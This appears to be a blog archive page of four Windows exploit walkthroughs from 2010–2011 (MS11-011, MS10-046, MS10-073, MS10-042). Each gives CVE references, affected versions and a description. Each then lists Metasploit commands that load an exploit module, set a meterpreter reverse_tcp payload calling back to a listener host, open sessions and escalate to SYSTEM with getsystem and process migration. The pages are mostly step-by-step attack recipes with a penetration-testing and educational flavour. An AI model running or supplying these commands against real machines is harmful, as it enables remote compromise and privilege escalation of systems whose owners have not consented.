Tag Archives: Windows

MS11-011 : Windows UAC Bypass 0day

Timeline :

Vulnerability released by noobpwnftw the 2010-11-24

PoC provided by :

noobpwnftw

Reference(s) :

CVE-2010-4398
EBD-ID-15609
MS11-011

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 SP1 and Windows Vista x64 SP2
Windows Server 2008 32 and Windows Server 2008 32 SP2
Windows Server 2008 x64 and Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows 7 Integral

Description :

Microsoft Windows does not adequately validate registry data read using the function RtlQueryRegistryValues(). By modifying an EUDC registry key value, a local user could execute arbitrary code with SYSTEM privileges.

Commands :

whoami
poc.exe
whoami

MS10-046 : Microsoft Windows Shell LNK Execution

Timeline :

Vulnerability discovered exploited in the wild, part of the Stuxnet worm
Metasploit PoC provided the 2010-07-19

PoC provided by :

hdmoore
jduck
B_H

Reference(s) :

CVE-2010-2568
MS10-046

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 et Windows Vista SP2
Windows Vista x64 Edition SP1 et Windows Vista x64 Edition SP2
Windows Server 2008 32 et Windows Server 2008 32 SP2
Windows Server 2008 x64 et Windows Server 2008 x64 SP2
Windows 7 32
Windows 7 x64
Windows Server 2008 R2 x64

Tested on Windows XP SP3

Description :

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL. This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Commands :

use windows/browser/ms10_046_shortcut_icon_dllloader
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

MS10-073 : Microsoft Windows Keyboard Layout Privilege Escalation

Timeline :

Vulnerability disclosed by Microsoft the 2010-10-12
Microsoft patch “KB981957” provided the 2010-10-12
Exploit-DB PoC provided by Ruben Santamarta the 2011-01-13
Metasploit PoC provided by jduck the 2011-01-17

PoC provided by :

Ruben Santamarta
jduck

Reference(s) :

CVE-2010-2743
MS10-073

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP1 and Windows Vista SP2
Windows Vista x64 Edition SP1 and Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit SP2
Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based SP2
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows Server 2008 R2 for x64-based Systems

Tested on Windows XP SP3

Description :

This module exploits the keyboard layout 0day exploited by Stuxnet. When processing specially crafted keyboard layout files (DLLs), the Windows kernel fails to validate that an array index is within the bounds of the array. By loading a specially crafted keyboard layout, an attacker can execute code in Ring 0.

Commands :

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
ifconfig
set LHOST 192.168.178.21
exploit -j

sessions
sessions -i 1
getuid
getsystem
ps
migrate xxxx
background

use post/windows/escalate/ms10_073_kbdlayout
info
show options
set SESSION 1
exploit

sessions -i 1
getuid
getsystem
shell

MS10-042 : Microsoft Windows Help Center XSS and Command Execution

Timeline :

Vulnerability & PoC disclosed by Tavis Ormandy the 2010-06-10
Metasploit PoC provided by natron the 2010-06-10
Microsoft patch “KB2229593” provided the 2010-07-13

PoC provided by :

Tavis Ormandy
natron

Reference(s) :

CVE-2010-1885
MS10-042

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP SP3 with :

Internet Explorer 8

Description :

Help and Support Center is the default application provided to access online documentation for Microsoft Windows. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the scheme “hcp”. Due to an error in validation of input to hcp:// combined with a local cross site scripting vulnerability and a specialized mechanism to launch the XSS trigger, arbitrary command execution can be achieved. On IE7 on XP SP2 or SP3, code execution is automatic. If WMP9 is installed, it can be used to launch the exploit automatically. If IE8 and WMP11, either can be used to launch the attack, but both pop dialog boxes asking the user if execution should continue. This exploit detects if non-intrusive mechanisms are available and will use one if possible. In the case of both IE8 and WMP11, the exploit defaults to using an iframe on IE8, but is configurable by setting the DIALOGMECH option to “none” or “player”.

Commands :

use windows/browser/ms10_042_helpctr_xss_cmd­_exec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig